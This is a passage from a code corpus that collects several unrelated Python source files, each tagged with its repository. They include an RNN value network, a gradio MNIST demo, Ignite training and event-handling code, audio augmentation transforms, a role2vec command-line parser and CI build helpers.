"""Computes a value given an observation.
Args:
observation (torch.Tensor): consistent with `input_tensor_spec`
state: empty for API consistent with ValueRNNNetwork
Returns:
value (torch.Tensor): a 1D tensor
state: empty
"""
observation, state = super().forward(observation, state)
value, _ = self._encoding_net(observation)
value = value.reshape(value.shape[0], *self._output_spec.shape)
return value, state
@gin.configurable
class ValueRNNNetwork(PreprocessorNetwork):
"""Outputs temporally correlated values."""
def __init__(self,
input_tensor_spec,
output_tensor_spec=TensorSpec(()),
input_preprocessors=None,
preprocessing_combiner=None,
conv_layer_params=None,
fc_layer_params=None,
lstm_hidden_size=100,
value_fc_layer_params=None,
activation=torch.relu_,
kernel_initializer=None,
name="ValueRNNNetwork"):
"""Creates an instance of `ValueRNNNetwork`.
Args:
input_tensor_spec (TensorSpec): the tensor spec of the input
output_tensor_spec (TensorSpec): spec for the output
input_preprocessors (nested InputPreprocessor): a nest of
`InputPreprocessor`, each of which will be applied to the
corresponding input. If not None, then it must
have the same structure with `input_tensor_spec` (after reshaping).
If any element is None, then it will be treated as math_ops.identity.
This arg is helpful if you want to have separate preprocessings
for different inputs by configuring a gin file without changing
the code. For example, embedding a discrete input before concatenating
it to another continuous vector.
preprocessing_combiner (NestCombiner): preprocessing called on
complex inputs. Note that this combiner must also accept
`input_tensor_spec` as the input to compute the processed
tensor spec. For example, see `alf.nest.utils.NestConcat`. This
arg is helpful if you want to combine inputs by configuring a
gin file without changing the code.
conv_layer_params (tuple[tuple]): a tuple of tuples where each
tuple takes a format `(filters, kernel_size, strides, padding)`,
where `padding` is optional.
fc_layer_params (tuple[int]): a tuple of integers representing hidden
FC layers for encoding the observation.
lstm_hidden_size (int or tuple[int]): the hidden size(s)
of the LSTM cell(s). Each size corresponds to a cell. If there
are multiple sizes, then lstm cells are stacked.
value_fc_layer_params (tuple[int]): a tuple of integers representing hidden
FC layers that are applied after the lstm cell's output.
activation (nn.functional): activation used for hidden layers. The
last layer will not be activated.
kernel_initializer (Callable): initializer for all the layers but
the last layer. If none is provided a default xavier_uniform
initializer will be used.
name (str):
"""
super().__init__(
input_tensor_spec,
input_preprocessors,
preprocessing_combiner,
name=name)
if kernel_initializer is None:
kernel_initializer = torch.nn.init.xavier_uniform_
last_kernel_initializer = functools.partial(torch.nn.init.uniform_, \
a=-0.03, b=0.03)
self._encoding_net = LSTMEncodingNetwork(
input_tensor_spec=self._processed_input_tensor_spec,
conv_layer_params=conv_layer_params,
pre_fc_layer_params=fc_layer_params,
hidden_size=lstm_hidden_size,
post_fc_layer_params=value_fc_layer_params,
activation=activation,
kernel_initializer=kernel_initializer,
last_layer_size=output_tensor_spec.numel,
last_activation=math_ops.identity,
last_kernel_initializer=last_kernel_initializer)
self._output_spec = output_tensor_spec
def forward(self, observation, state):
"""Computes a value given an observation.
Args:
observation (torch.Tensor): consistent with `input_tensor_spec`
state (nest[tuple]): a nest structure of state tuples (h, c)
Returns:
value (torch.Tensor): a 1D tensor
new_state (nest[tuple]): the updated states
"""
observation, state = super().forward(observation, state)
value, state = self._encoding_net(observation, state)
value = value.reshape(value.shape[0], *self._output_spec.shape)
return value, state
@property
def state_spec(self):
return self._encoding_net.state_spec
``` |
{
"source": "1nF0rmed/gradio",
"score": 3
} |
#### File: gradio/demo/digit_classifier.py
```python
import tensorflow as tf
import gradio
import gradio as gr
from urllib.request import urlretrieve
import os
urlretrieve("https://gr-models.s3-us-west-2.amazonaws.com/mnist-model.h5", "mnist-model.h5")
model = tf.keras.models.load_model("mnist-model.h5")
def recognize_digit(image):
image = image.reshape(1, -1)
prediction = model.predict(image).tolist()[0]
return {str(i): prediction[i] for i in range(10)}
im = gradio.inputs.Image(shape=(28, 28), image_mode='L', invert_colors=False, source="canvas")
iface = gr.Interface(
recognize_digit,
im,
gradio.outputs.Label(num_top_classes=3),
live=True,
interpretation="default",
capture_session=True,
)
iface.test_launch()
if __name__ == "__main__":
iface.launch()
``` |
{
"source": "1nF0rmed/ignite",
"score": 2
} |
#### File: code/scripts/training.py
```python
import sys
from collections.abc import Mapping
from pathlib import Path
import torch
from apex import amp
from dataflow.datasets import VOCSegmentationOpencv
from py_config_runner.config_utils import TRAINVAL_CONFIG, assert_config, get_params
from py_config_runner.utils import set_seed
from utils import exp_tracking
from utils.handlers import predictions_gt_images_handler
import ignite
import ignite.distributed as idist
from ignite.contrib.engines import common
from ignite.engine import Engine, Events, create_supervised_evaluator
from ignite.handlers import DiskSaver
from ignite.metrics import ConfusionMatrix, IoU, mIoU
from ignite.utils import setup_logger
# Adds "code" folder to python path
sys.path.insert(0, Path(__file__).parent.parent.as_posix())
def initialize(config):
model = config.model.to(config.device)
optimizer = config.optimizer
# Setup Nvidia/Apex AMP
model, optimizer = amp.initialize(model, optimizer, opt_level=getattr(config, "fp16_opt_level", "O2"), num_losses=1)
# Adapt model to dist conf
model = idist.auto_model(model)
criterion = config.criterion.to(config.device)
return model, optimizer, criterion
def get_save_handler(config):
if exp_tracking.has_clearml:
from ignite.contrib.handlers.clearml_logger import ClearMLSaver
return ClearMLSaver(dirname=config.output_path.as_posix())
return DiskSaver(config.output_path.as_posix())
def create_trainer(model, optimizer, criterion, train_sampler, config, logger):
prepare_batch = config.prepare_batch
device = config.device
# Setup trainer
accumulation_steps = getattr(config, "accumulation_steps", 1)
model_output_transform = getattr(config, "model_output_transform", lambda x: x)
def train_update_function(engine, batch):
model.train()
x, y = prepare_batch(batch, device=device, non_blocking=True)
y_pred = model(x)
y_pred = model_output_transform(y_pred)
loss = criterion(y_pred, y)
if isinstance(loss, Mapping):
assert "supervised batch loss" in loss
loss_dict = loss
output = {k: v.item() for k, v in loss_dict.items()}
loss = loss_dict["supervised batch loss"] / accumulation_steps
else:
output = {"supervised batch loss": loss.item()}
with amp.scale_loss(loss, optimizer, loss_id=0) as scaled_loss:
scaled_loss.backward()
if engine.state.iteration % accumulation_steps == 0:
optimizer.step()
optimizer.zero_grad()
return output
output_names = getattr(config, "output_names", ["supervised batch loss",])
lr_scheduler = config.lr_scheduler
trainer = Engine(train_update_function)
trainer.logger = logger
to_save = {"model": model, "optimizer": optimizer, "lr_scheduler": lr_scheduler, "trainer": trainer, "amp": amp}
save_every_iters = getattr(config, "save_every_iters", 1000)
common.setup_common_training_handlers(
trainer,
train_sampler,
to_save=to_save,
save_every_iters=save_every_iters,
save_handler=get_save_handler(config),
lr_scheduler=lr_scheduler,
with_gpu_stats=exp_tracking.has_mlflow,
output_names=output_names,
with_pbars=False,
)
if idist.get_rank() == 0:
common.ProgressBar(persist=False).attach(trainer, metric_names="all")
return trainer
def create_evaluators(model, metrics, config):
model_output_transform = getattr(config, "model_output_transform", lambda x: x)
evaluator_args = dict(
model=model,
metrics=metrics,
device=config.device,
non_blocking=True,
prepare_batch=config.prepare_batch,
output_transform=lambda x, y, y_pred: (model_output_transform(y_pred), y,),
)
train_evaluator = create_supervised_evaluator(**evaluator_args)
evaluator = create_supervised_evaluator(**evaluator_args)
if idist.get_rank() == 0:
common.ProgressBar(desc="Evaluation (train)", persist=False).attach(train_evaluator)
common.ProgressBar(desc="Evaluation (val)", persist=False).attach(evaluator)
return evaluator, train_evaluator
def log_metrics(logger, epoch, elapsed, tag, metrics):
metrics_output = "\n".join([f"\t{k}: {v}" for k, v in metrics.items()])
logger.info(f"\nEpoch {epoch} - Evaluation time (seconds): {int(elapsed)} - {tag} metrics:\n {metrics_output}")
def log_basic_info(logger, config):
msg = f"\n- PyTorch version: {torch.__version__}"
msg += f"\n- Ignite version: {ignite.__version__}"
msg += f"\n- Cuda device name: {torch.cuda.get_device_name(idist.get_local_rank())}"
logger.info(msg)
if idist.get_world_size() > 1:
msg = "\nDistributed setting:"
msg += f"\tbackend: {idist.backend()}"
msg += f"\trank: {idist.get_rank()}"
msg += f"\tworld size: {idist.get_world_size()}"
logger.info(msg)
def training(local_rank, config, logger=None):
if not getattr(config, "use_fp16", True):
raise RuntimeError("This training script uses by default fp16 AMP")
torch.backends.cudnn.benchmark = True
set_seed(config.seed + local_rank)
train_loader, val_loader, train_eval_loader = config.train_loader, config.val_loader, config.train_eval_loader
# Setup model, optimizer, criterion
model, optimizer, criterion = initialize(config)
# Setup trainer for this specific task
trainer = create_trainer(model, optimizer, criterion, train_loader.sampler, config, logger)
# Setup evaluators
num_classes = config.num_classes
cm_metric = ConfusionMatrix(num_classes=num_classes)
val_metrics = {
"IoU": IoU(cm_metric),
"mIoU_bg": mIoU(cm_metric),
}
if hasattr(config, "val_metrics") and isinstance(config.val_metrics, dict):
val_metrics.update(config.val_metrics)
evaluator, train_evaluator = create_evaluators(model, val_metrics, config)
val_interval = getattr(config, "val_interval", 1)
@trainer.on(Events.EPOCH_COMPLETED(every=val_interval))
def run_validation():
epoch = trainer.state.epoch
state = train_evaluator.run(train_eval_loader)
log_metrics(logger, epoch, state.times["COMPLETED"], "Train", state.metrics)
state = evaluator.run(val_loader)
log_metrics(logger, epoch, state.times["COMPLETED"], "Test", state.metrics)
if config.num_epochs % val_interval != 0:
trainer.add_event_handler(Events.COMPLETED, run_validation)
if getattr(config, "start_by_validation", False):
trainer.add_event_handler(Events.STARTED, run_validation)
score_metric_name = "mIoU_bg"
if hasattr(config, "es_patience"):
common.add_early_stopping_by_val_score(config.es_patience, evaluator, trainer, metric_name=score_metric_name)
# Store 3 best models by validation accuracy:
common.gen_save_best_models_by_val_score(
save_handler=get_save_handler(config),
evaluator=evaluator,
models=model,
metric_name=score_metric_name,
n_saved=3,
trainer=trainer,
tag="val",
)
if idist.get_rank() == 0:
tb_logger = common.setup_tb_logging(
config.output_path.as_posix(),
trainer,
optimizer,
evaluators={"training": train_evaluator, "validation": evaluator},
)
if not exp_tracking.has_clearml:
exp_tracking_logger = exp_tracking.setup_logging(
trainer, optimizer, evaluators={"training": train_evaluator, "validation": evaluator}
)
# Log validation predictions as images
# We define a custom event filter to log less frequently the images (to reduce storage size)
# - we plot images with masks of the middle validation batch
# - once every 3 validations and
# - at the end of the training
def custom_event_filter(_, val_iteration):
c1 = val_iteration == len(val_loader) // 2
c2 = trainer.state.epoch % (getattr(config, "val_interval", 1) * 3) == 0
c2 |= trainer.state.epoch == config.num_epochs
return c1 and c2
tb_logger.attach(
evaluator,
log_handler=predictions_gt_images_handler(
img_denormalize_fn=config.img_denormalize, n_images=15, another_engine=trainer, prefix_tag="validation"
),
event_name=Events.ITERATION_COMPLETED(event_filter=custom_event_filter),
)
# Log confusion matrix to ClearML:
if exp_tracking.has_clearml:
@trainer.on(Events.COMPLETED)
def compute_and_log_cm():
cm = cm_metric.compute()
# CM: values are normalized such that diagonal values represent class recalls
cm = ConfusionMatrix.normalize(cm, "recall").cpu().numpy()
if idist.get_rank() == 0:
try:
from clearml import Task
except ImportError:
# Backwards-compatibility for legacy Trains SDK
from trains import Task
clearml_logger = Task.current_task().get_logger()
clearml_logger.report_confusion_matrix(
title="Final Confusion Matrix",
series="cm-preds-gt",
matrix=cm,
iteration=trainer.state.iteration,
xlabels=VOCSegmentationOpencv.target_names,
ylabels=VOCSegmentationOpencv.target_names,
)
trainer.run(train_loader, max_epochs=config.num_epochs)
if idist.get_rank() == 0:
tb_logger.close()
if not exp_tracking.has_clearml:
exp_tracking_logger.close()
def run(config, **kwargs):
"""This is the main method to run the training. As this training script is launched with `py_config_runner`
it should obligatory contain `run(config, **kwargs)` method.
"""
assert torch.cuda.is_available(), torch.cuda.is_available()
assert torch.backends.cudnn.enabled, "Nvidia/Amp requires cudnn backend to be enabled."
with idist.Parallel(backend="nccl") as parallel:
logger = setup_logger(name="Pascal-VOC12 Training", distributed_rank=idist.get_rank())
assert_config(config, TRAINVAL_CONFIG)
# The following attributes are automatically added by py_config_runner
assert hasattr(config, "config_filepath") and isinstance(config.config_filepath, Path)
assert hasattr(config, "script_filepath") and isinstance(config.script_filepath, Path)
if idist.get_rank() == 0 and exp_tracking.has_clearml:
try:
from clearml import Task
except ImportError:
# Backwards-compatibility for legacy Trains SDK
from trains import Task
task = Task.init("Pascal-VOC12 Training", config.config_filepath.stem)
task.connect_configuration(config.config_filepath.as_posix())
log_basic_info(logger, config)
config.output_path = Path(exp_tracking.get_output_path())
# dump python files to reproduce the run
exp_tracking.log_artifact(config.config_filepath.as_posix())
exp_tracking.log_artifact(config.script_filepath.as_posix())
exp_tracking.log_params(get_params(config, TRAINVAL_CONFIG))
try:
parallel.run(training, config, logger=logger)
except KeyboardInterrupt:
logger.info("Catched KeyboardInterrupt -> exit")
except Exception as e: # noqa
logger.exception("")
raise e
```
#### File: ignite/engine/events.py
```python
import numbers
import warnings
import weakref
from enum import Enum
from types import DynamicClassAttribute
from typing import TYPE_CHECKING, Any, Callable, Dict, Iterable, Iterator, List, Optional, Union
from torch.utils.data import DataLoader
from ignite.engine.utils import _check_signature
if TYPE_CHECKING:
from ignite.engine.engine import Engine
__all__ = ["CallableEventWithFilter", "EventEnum", "Events", "State", "EventsList", "RemovableEventHandle"]
class CallableEventWithFilter:
"""Single Event containing a filter, specifying whether the event should
be run at the current event (if the event type is correct)
Args:
value (str): The actual enum value. Only needed for internal use. Do not touch!
event_filter (callable): A function taking the engine and the current event value as input and returning a
boolean to indicate whether this event should be executed. Defaults to None, which will result to a
function that always returns `True`
name (str, optional): The enum-name of the current object. Only needed for internal use. Do not touch!
"""
def __init__(self, value: str, event_filter: Optional[Callable] = None, name: Optional[str] = None) -> None:
if event_filter is None:
event_filter = CallableEventWithFilter.default_event_filter
self.filter = event_filter
if not hasattr(self, "_value_"):
self._value_ = value
if not hasattr(self, "_name_") and name is not None:
self._name_ = name
# copied to be compatible to enum
@DynamicClassAttribute
def name(self) -> str:
"""The name of the Enum member."""
return self._name_
@DynamicClassAttribute
def value(self) -> str:
"""The value of the Enum member."""
return self._value_
def __call__(
self, event_filter: Optional[Callable] = None, every: Optional[int] = None, once: Optional[int] = None
) -> "CallableEventWithFilter":
"""
Makes the event class callable and accepts either an arbitrary callable as filter
(which must take in the engine and current event value and return a boolean) or an every or once value
Args:
event_filter (callable, optional): a filter function to check if the event should be executed when
the event type was fired
every (int, optional): a value specifying how often the event should be fired
once (int, optional): a value specifying when the event should be fired (if only once)
Returns:
CallableEventWithFilter: A new event having the same value but a different filter function
"""
if not ((event_filter is not None) ^ (every is not None) ^ (once is not None)):
raise ValueError("Only one of the input arguments should be specified")
if (event_filter is not None) and not callable(event_filter):
raise TypeError("Argument event_filter should be a callable")
if (every is not None) and not (isinstance(every, numbers.Integral) and every > 0):
raise ValueError("Argument every should be integer and greater than zero")
if (once is not None) and not (isinstance(once, numbers.Integral) and once > 0):
raise ValueError("Argument every should be integer and positive")
if every is not None:
if every == 1:
# Just return the event itself
event_filter = None
else:
event_filter = self.every_event_filter(every)
if once is not None:
event_filter = self.once_event_filter(once)
# check signature:
if event_filter is not None:
_check_signature(event_filter, "event_filter", "engine", "event")
return CallableEventWithFilter(self.value, event_filter, self.name)
@staticmethod
def every_event_filter(every: int) -> Callable:
def wrapper(engine: "Engine", event: int) -> bool:
if event % every == 0:
return True
return False
return wrapper
@staticmethod
def once_event_filter(once: int) -> Callable:
def wrapper(engine: "Engine", event: int) -> bool:
if event == once:
return True
return False
return wrapper
@staticmethod
def default_event_filter(engine: "Engine", event: int) -> bool:
return True
def __str__(self) -> str:
return "<event=%s, filter=%r>" % (self.name, self.filter)
def __eq__(self, other: Any) -> bool:
if isinstance(other, CallableEventWithFilter):
return self.name == other.name
elif isinstance(other, str):
return self.name == other
else:
return NotImplemented
def __hash__(self) -> int:
return hash(self._name_)
def __or__(self, other: Any) -> "EventsList":
return EventsList() | self | other
class EventEnum(CallableEventWithFilter, Enum): # type: ignore[misc]
"""Base class for all :class:`~ignite.engine.events.Events`. User defined custom events should also inherit
this class. For example, Custom events based on the loss calculation and backward pass can be created as follows:
.. code-block:: python
from ignite.engine import EventEnum
class BackpropEvents(EventEnum):
BACKWARD_STARTED = 'backward_started'
BACKWARD_COMPLETED = 'backward_completed'
OPTIM_STEP_COMPLETED = 'optim_step_completed'
def update(engine, batch):
# ...
loss = criterion(y_pred, y)
engine.fire_event(BackpropEvents.BACKWARD_STARTED)
loss.backward()
engine.fire_event(BackpropEvents.BACKWARD_COMPLETED)
optimizer.step()
engine.fire_event(BackpropEvents.OPTIM_STEP_COMPLETED)
# ...
trainer = Engine(update)
trainer.register_events(*BackpropEvents)
@trainer.on(BackpropEvents.BACKWARD_STARTED)
def function_before_backprop(engine):
# ...
"""
pass
class Events(EventEnum):
"""Events that are fired by the :class:`~ignite.engine.engine.Engine` during execution. Built-in events:
- STARTED : triggered when engine's run is started
- EPOCH_STARTED : triggered when the epoch is started
- GET_BATCH_STARTED : triggered before next batch is fetched
- GET_BATCH_COMPLETED : triggered after the batch is fetched
- ITERATION_STARTED : triggered when an iteration is started
- ITERATION_COMPLETED : triggered when the iteration is ended
- DATALOADER_STOP_ITERATION : engine's specific event triggered when dataloader has no more data to provide
- EXCEPTION_RAISED : triggered when an exception is encountered
- TERMINATE_SINGLE_EPOCH : triggered when the run is about to end the current epoch,
after receiving a :meth:`~ignite.engine.engine.Engine.terminate_epoch()` or
:meth:`~ignite.engine.engine.Engine.terminate()` call.
- TERMINATE : triggered when the run is about to end completely,
after receiving :meth:`~ignite.engine.engine.Engine.terminate()` call.
- EPOCH_COMPLETED : triggered when the epoch is ended. Note that this is triggered even
when :meth:`~ignite.engine.engine.Engine.terminate_epoch()` is called.
- COMPLETED : triggered when engine's run is completed
The table below illustrates which events are triggered when various termination methods are called.
.. list-table::
:widths: 24 25 33 18
:header-rows: 1
* - Method
- EVENT_COMPLETED
- TERMINATE_SINGLE_EPOCH
- TERMINATE
* - no termination
- ✔
- ✗
- ✗
* - :meth:`~ignite.engine.engine.Engine.terminate_epoch()`
- ✔
- ✔
- ✗
* - :meth:`~ignite.engine.engine.Engine.terminate()`
- ✗
- ✔
- ✔
Since v0.3.0, Events become more flexible and allow to pass an event filter to the Engine:
.. code-block:: python
engine = Engine()
# a) custom event filter
def custom_event_filter(engine, event):
if event in [1, 2, 5, 10, 50, 100]:
return True
return False
@engine.on(Events.ITERATION_STARTED(event_filter=custom_event_filter))
def call_on_special_event(engine):
# do something on 1, 2, 5, 10, 50, 100 iterations
# b) "every" event filter
@engine.on(Events.ITERATION_STARTED(every=10))
def call_every(engine):
# do something every 10th iteration
# c) "once" event filter
@engine.on(Events.ITERATION_STARTED(once=50))
def call_once(engine):
# do something on 50th iteration
Event filter function `event_filter` accepts as input `engine` and `event` and should return True/False.
Argument `event` is the value of iteration or epoch, depending on which type of Events the function is passed.
Since v0.4.0, user can also combine events with `|`-operator:
.. code-block:: python
events = Events.STARTED | Events.COMPLETED | Events.ITERATION_STARTED(every=3)
engine = ...
@engine.on(events)
def call_on_events(engine):
# do something
Since v0.4.0, custom events defined by user should inherit from :class:`~ignite.engine.events.EventEnum` :
.. code-block:: python
class CustomEvents(EventEnum):
FOO_EVENT = "foo_event"
BAR_EVENT = "bar_event"
"""
EPOCH_STARTED = "epoch_started"
EPOCH_COMPLETED = "epoch_completed"
STARTED = "started"
COMPLETED = "completed"
ITERATION_STARTED = "iteration_started"
ITERATION_COMPLETED = "iteration_completed"
EXCEPTION_RAISED = "exception_raised"
GET_BATCH_STARTED = "get_batch_started"
GET_BATCH_COMPLETED = "get_batch_completed"
DATALOADER_STOP_ITERATION = "dataloader_stop_iteration"
TERMINATE = "terminate"
TERMINATE_SINGLE_EPOCH = "terminate_single_epoch"
def __or__(self, other: Any) -> "EventsList":
return EventsList() | self | other
class EventsList:
"""Collection of events stacked by operator `__or__`.
.. code-block:: python
events = Events.STARTED | Events.COMPLETED
events |= Events.ITERATION_STARTED(every=3)
engine = ...
@engine.on(events)
def call_on_events(engine):
# do something
or
.. code-block:: python
@engine.on(Events.STARTED | Events.COMPLETED | Events.ITERATION_STARTED(every=3))
def call_on_events(engine):
# do something
"""
def __init__(self) -> None:
self._events = [] # type: List[Union[Events, CallableEventWithFilter]]
def _append(self, event: Union[Events, CallableEventWithFilter]) -> None:
if not isinstance(event, (Events, CallableEventWithFilter)):
raise TypeError(f"Argument event should be Events or CallableEventWithFilter, got: {type(event)}")
self._events.append(event)
def __getitem__(self, item: int) -> Union[Events, CallableEventWithFilter]:
return self._events[item]
def __iter__(self) -> Iterator[Union[Events, CallableEventWithFilter]]:
return iter(self._events)
def __len__(self) -> int:
return len(self._events)
def __or__(self, other: Union[Events, CallableEventWithFilter]) -> "EventsList":
self._append(event=other)
return self
class State:
"""An object that is used to pass internal and user-defined state between event handlers. By default, state
contains the following attributes:
.. code-block:: python
state.iteration # 1-based, the first iteration is 1
state.epoch # 1-based, the first epoch is 1
state.seed # seed to set at each epoch
state.dataloader # data passed to engine
state.epoch_length # optional length of an epoch
state.max_epochs # number of epochs to run
state.max_iters # number of iterations to run
state.batch # batch passed to `process_function`
state.output # output of `process_function` after a single iteration
state.metrics # dictionary with defined metrics if any
state.times # dictionary with total and per-epoch times fetched on
# keys: Events.EPOCH_COMPLETED.name and Events.COMPLETED.name
"""
event_to_attr = {
Events.GET_BATCH_STARTED: "iteration",
Events.GET_BATCH_COMPLETED: "iteration",
Events.ITERATION_STARTED: "iteration",
Events.ITERATION_COMPLETED: "iteration",
Events.EPOCH_STARTED: "epoch",
Events.EPOCH_COMPLETED: "epoch",
Events.STARTED: "epoch",
Events.COMPLETED: "epoch",
} # type: Dict[Union[str, "Events", "CallableEventWithFilter"], str]
def __init__(self, **kwargs: Any) -> None:
self.iteration = 0
self.epoch = 0
self.epoch_length = None # type: Optional[int]
self.max_epochs = None # type: Optional[int]
self.max_iters = None # type: Optional[int]
self.output = None # type: Optional[int]
self.batch = None # type: Optional[int]
self.metrics = {} # type: Dict[str, Any]
self.dataloader = None # type: Optional[Union[DataLoader, Iterable[Any]]]
self.seed = None # type: Optional[int]
self.times = {
Events.EPOCH_COMPLETED.name: None,
Events.COMPLETED.name: None,
} # type: Dict[str, Optional[float]]
for k, v in kwargs.items():
setattr(self, k, v)
self._update_attrs()
def _update_attrs(self) -> None:
for value in self.event_to_attr.values():
if not hasattr(self, value):
setattr(self, value, 0)
def get_event_attrib_value(self, event_name: Union[str, Events, CallableEventWithFilter]) -> int:
if event_name not in State.event_to_attr:
raise RuntimeError(f"Unknown event name '{event_name}'")
return getattr(self, State.event_to_attr[event_name])
def __repr__(self) -> str:
s = "State:\n"
for attr, value in self.__dict__.items():
if not isinstance(value, (numbers.Number, str)):
value = type(value)
s += f"\t{attr}: {value}\n"
return s
class RemovableEventHandle:
"""A weakref handle to remove a registered event.
A handle that may be used to remove a registered event handler via the
remove method, with-statement, or context manager protocol. Returned from
:meth:`~ignite.engine.engine.Engine.add_event_handler`.
Args:
event_name: Registered event name.
handler: Registered event handler, stored as weakref.
engine: Target engine, stored as weakref.
Example usage:
.. code-block:: python
engine = Engine()
def print_epoch(engine):
print(f"Epoch: {engine.state.epoch}")
with engine.add_event_handler(Events.EPOCH_COMPLETED, print_epoch):
# print_epoch handler registered for a single run
engine.run(data)
# print_epoch handler is now unregistered
"""
def __init__(
self, event_name: Union[CallableEventWithFilter, Enum, EventsList, Events], handler: Callable, engine: "Engine"
) -> None:
self.event_name = event_name
self.handler = weakref.ref(handler)
self.engine = weakref.ref(engine)
def remove(self) -> None:
"""Remove handler from engine."""
handler = self.handler()
engine = self.engine()
if handler is None or engine is None:
return
if isinstance(self.event_name, EventsList):
for e in self.event_name:
if engine.has_event_handler(handler, e):
engine.remove_event_handler(handler, e)
else:
if engine.has_event_handler(handler, self.event_name):
engine.remove_event_handler(handler, self.event_name)
def __enter__(self) -> "RemovableEventHandle":
return self
def __exit__(self, *args: Any, **kwargs: Any) -> None:
self.remove()
``` |
{
"source": "1nF0rmed/speech_recog",
"score": 3
} |
#### File: 1nF0rmed/speech_recog/augmentation_transforms.py
```python
import config
import custom_transforms as t
from dataset import load_noise_waves
augmentations = {
'mel': t.MelSpectrogram(n_mels=128, hop_length=126),
'mfcc': t.Mfcc(n_mels=128, hop_length=126),
}
def make_augmentation_transforms(augmentation, mode):
if mode == 'train':
transforms = [
t.RandomPadToLength(length=config.AUDIO_LENGTH),
t.Noise(
length=config.AUDIO_LENGTH,
noise_waves=load_noise_waves(),
noise_limit=0.2,
).with_prob(0.5),
t.RandomShift(shift_limit=0.2).with_prob(0.5),
]
else:
transforms = [t.PadToLength(length=config.AUDIO_LENGTH)]
transforms.append(augmentations[augmentation])
transforms += [
t.Pad(((0, 0), (0, 1)), 'constant'),
t.ExpandDims(),
t.ToTensor(),
]
return t.Compose(transforms)
``` |
{
"source": "1nf1del/role2vec",
"score": 3
} |
#### File: role2vec/src/parser.py
```python
import argparse
def parameter_parser():
"""
A method to parse up command line parameters.
The default hyperparameters give a good quality representation without grid search.
Representations are sorted by ID.
"""
parser = argparse.ArgumentParser(description = "Run Role2Vec.")
parser.add_argument('--graph-input',
nargs = '?',
default = "./input/cora_edges.csv",
help = 'Input graph path -- edge list csv.')
parser.add_argument('--output',
nargs = '?',
default = './output/cora_role2vec.csv',
help = 'Embeddings path.')
parser.add_argument('--window-size',
type = int,
default = 5,
help = 'Window size for skip-gram. Default is 5.')
parser.add_argument('--walk-number',
type = int,
default = 10,
help = 'Number of random walks. Default is 10.')
parser.add_argument('--walk-length',
type = int,
default = 80,
help = 'Walk length. Default is 80.')
parser.add_argument('--sampling',
nargs = '?',
default = 'first',
help = 'Random walk order.')
parser.add_argument('--P',
type = float,
default = 1.00,
help = 'Return parameter. Default is 1.0.')
parser.add_argument('--Q',
type = float,
default = 1.00,
help = 'Inout parameter. Default is 1.0.')
parser.add_argument('--dimensions',
type = int,
default = 128,
help = 'Number of dimensions. Default is 128.')
parser.add_argument('--down-sampling',
type = float,
default = 0.001,
help = 'Down sampling frequency. Default is 0.001.')
parser.add_argument('--alpha',
type = float,
default = 0.025,
help = 'Initial learning rate. Default is 0.025.')
parser.add_argument('--min-alpha',
type = float,
default = 0.025,
help = 'Final learning rate. Default is 0.025.')
parser.add_argument('--min-count',
type = int,
default = 1,
help = 'Minimal feature count. Default is 1.')
parser.add_argument('--workers',
type = int,
default = 4,
help = 'Number of cores. Default is 4.')
parser.add_argument('--epochs',
type = int,
default = 10,
help = 'Number of epochs. Default is 10.')
parser.add_argument('--features',
nargs = '?',
default = 'wl',
help = 'Feature extraction mechanism. Default is wl.')
parser.add_argument('--labeling-iterations',
type = int,
default = 2,
help = 'Number of WL labeling iterations. Default is 2.')
parser.add_argument('--log-base',
type = int,
default = 1.5,
help = 'Log base for label creation. Default is 1.5.')
parser.add_argument('--graphlet-size',
type = int,
default = 4,
help = 'Maximal graphlet size. Default is 4.')
parser.add_argument('--quantiles',
type = int,
default = 5,
help = 'Number of quantiles for binning. Default is 5.')
parser.add_argument('--motif-compression',
nargs = '?',
default = 'string',
help = 'Motif compression procedure -- string or factorization.')
parser.add_argument('--seed',
type = int,
default = 42,
help = 'Sklearn random seed. Default is 42.')
parser.add_argument('--factors',
type = int,
default = 8,
help = 'Number of factors for motif compression. Default is 8.')
parser.add_argument('--clusters',
type = int,
default = 50,
help = 'Number of motif based labels. Default is 50.')
parser.add_argument('--beta',
type = float,
default = 0.01,
help = 'Motif compression factorization regularizer. Default is 0.01.')
return parser.parse_args()
``` |
{
"source": "1nf1n1ty08/funwithserverless",
"score": 2
} |
#### File: _CI/library/template_library.py
```python
class Environment():
def __init__(self, full_name, short_name, branch_name):
self._full_name = full_name
self._short_name = short_name
self._branch_name = branch_name
@property
def full_name(self):
return self._full_name
@property
def short_name(self):
return self._short_name
@property
def branch_name(self):
return self._branch_name
def __eq__(self, other):
return self.full_name == other.full_name
def __hash__(self):
return hash(self.full_name)
class Test(Environment):
def __init__(self):
super().__init__('test', 't', 'test')
class Acceptance(Environment):
def __init__(self):
super().__init__('acceptance', 'a', 'acceptance')
class Services(Environment):
def __init__(self):
super().__init__('services', 's', 'services')
class Production(Environment):
def __init__(self):
super().__init__('production', 'p', 'master')
def get_possible_environments():
return [Test(), Acceptance(), Services(), Production()]
def get_environment(git):
current_branch = git.get_current_branch()
environment = Test()
for env in get_possible_environments():
if env.branch_name == current_branch:
environment = env
return environment
```
#### File: _CI/scripts/build.py
```python
import logging
import os
import shutil
import time
# this sets up everything and MUST be included before any third party module in every step
import _initialize_template
from emoji import emojize
from bootstrap import bootstrap
from configuration import BUILD_REQUIRED_FILES, LOGGING_LEVEL, PROJECT_SLUG, PROJECT_PREFIX
from library import (clean_up,
execute_command,
save_requirements,
get_venv_parent_path,
get_environment)
# This is the main prefix used for logging
LOGGER_BASENAME = '''_CI.build'''
LOGGER = logging.getLogger(LOGGER_BASENAME)
LOGGER.addHandler(logging.NullHandler())
def build():
bootstrap()
# clean_up(('build', 'dist'))
success = execute_command('pipenv lock')
if success:
LOGGER.info('Successfully created lock file %s %s',
emojize(':white_heavy_check_mark:'),
emojize(':thumbs_up:'))
else:
LOGGER.error('%s Errors creating lock file! %s',
emojize(':cross_mark:'),
emojize(':crying_face:'))
raise SystemExit(1)
save_requirements(get_venv_parent_path(), [], True)
[save_requirements('./src/containers/' + folder, [], False) for folder in os.listdir('./src/containers/')
if os.path.isdir('./src/containers/' + folder) and '__pycache__' not in folder]
environment = get_environment()
ref_name = os.environ.get('CI_COMMIT_REF_NAME')
if ref_name:
ref_name = ref_name.replace("/", "-")
ecr_repo = os.environ.get('ECR_REPOSITORY')
if not ecr_repo:
ecr_repo = PROJECT_PREFIX
version = os.environ.get('CI_COMMIT_TAG')
base_name = ecr_repo + '/' + PROJECT_PREFIX + environment + '-' + PROJECT_SLUG + '-' + ref_name
for folder in os.listdir('./src/containers/'):
if os.path.isdir('./src/containers/' + folder) and '__pycache__' not in folder:
docker_build = 'docker build -t ' + base_name + '-' + folder + ':latest'
if version:
